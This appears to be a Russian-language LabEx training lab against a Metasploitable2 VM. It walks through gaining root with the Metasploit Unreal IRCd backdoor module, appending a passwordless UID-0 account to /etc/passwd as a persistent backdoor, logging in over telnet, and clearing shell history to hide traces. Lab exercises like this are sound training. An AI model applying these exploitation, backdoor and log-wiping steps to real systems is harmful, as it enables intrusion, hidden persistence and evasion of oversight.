Введение
В этом практическом занятии мы научимся создавать обратную дверь (backdoor) и удалять следы после успешного получения доступа к целевой машине в ходе пенетрационного атаки. Сценарий настроен в среде LabEx, где мы будем использовать терминал Kali для эксплойта уязвимостей на целевой машине Metasploitable2, получения root-доступа, создания обратной двери для последующего доступа и удаления любых следов, оставшихся в процессе атаки.
Получить root-доступ на целевой машине
На этом шаге мы воспользуемся уязвимостью Unreal Ircd для получения root-доступа на целевой машине.
Теперь вы запустите машину-атакующую (контейнер Kali Linux) и целевую машину (виртуальную машину Metasploitable2) для эксперимента.
- Откройте терминал xfce на хост-машине LabEx и запустите целевую машину Metasploitable2, выполнив следующую команду:
sudo virsh start Metasploitable2
Подождите, пока целевая машина запустится, это может занять от 1 до 3 минут.
- Проверьте связь с целевой машиной, отправив ей пинги:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить отправку пингов.
- Запустите контейнер Kali Linux и войдите в среду bash, выполнив следующую команду:
docker run -ti --network host b5b709a49cd5 bash
- Внутри контейнера Kali проверьте сетевое соединение с целевой машиной:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить отправку пингов.
Теперь и машина-атакующая, и целевая машина запущены, и вы можете приступить к пенетрационному тестированию.
Примечание: Если вы случайно выйдете из текущего сеанса bash, контейнер Kali автоматически остановится. Вы можете снова выполнить команду docker run -ti --network host b5b709a49cd5 bash на хост-машине, чтобы запустить новый контейнер Kali и войти в bash для продолжения эксперимента.
- В контейнере Kali Linux введите следующие команды в терминале bash Kali Linux:
service postgresql start
msfdb init
cd ~
msfconsole
Это запустит службу базы данных PostgreSQL, инициализирует базу данных и запустит консоль Metasploit Framework (msfconsole) для дальнейших операций.
- Найдите модуль уязвимости Unreal Ircd:
search unreal_ircd
- Используйте модуль
unix/irc/unreal_ircd_3281_backdoor:
use exploit/unix/irc/unreal_ircd_3281_backdoor
- Установите IP-адрес цели:
set RHOST 192.168.122.102
- Эксплуатируйте уязвимость для получения доступа:
exploit
- Проверьте текущего пользователя:
whoami
Вы должны увидеть, что вы получили root-доступ на целевой машине.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Создать бэкдор
Теперь, когда мы получили root-доступ, давайте создадим обратную дверь для последующего доступа к целевой машине.
Во - первых, если вы не находитесь в консоли Metasploit, вы должны запустить консоль Metasploit:
cd ~
msfconsole
Затем проверьте системную информацию:
uname -a
Найдите расположение bash для пользователя root:
cat /etc/passwd
Создайте учетную запись для обратной двери без пароля:
echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwd
Проверьте создание учетной записи для обратной двери:
cat /etc/passwd
В выводе вы должны увидеть новую учетную запись shiyanlou1234.
Откройте новый терминал и подключитесь к целевой машине с использованием учетной записи для обратной двери:
telnet 192.168.122.102
При запросе введите имя пользователя shiyanlou1234.
Проверьте текущего пользователя:
whoami
Вы должны увидеть, что вы вошли в систему как пользователь обратной двери.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Удалить следы
После получения доступа и создания обратной двери (backdoor) важно удалить все следы, оставшиеся в процессе атаки, чтобы избежать обнаружения.
Во - первых, если вы не находитесь в консоли Metasploit, вы должны запустить консоль Metasploit:
cd ~
msfconsole
Одним из распространенных способов удаления следов является удаление истории команд. История хранится в файле .bash_history. Вы можете очистить историю с помощью следующей команды:
history -c
Для очистки файла .bash_history вы можете найти его расположение с помощью команды find:
find / -name.bash_history
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Резюме
В этом практическом занятии мы научились получать root-доступ на целевой машине, используя уязвимость Unreal Ircd, создавать учетную запись для обратной двери (backdoor) для последующего доступа и удалять следы, оставшиеся в процессе атаки. Этот практический опыт поможет вам понять методы, используемые атакающими для сохранения постоянного доступа и скрытия своих следов после успешной пенетрационной атаки.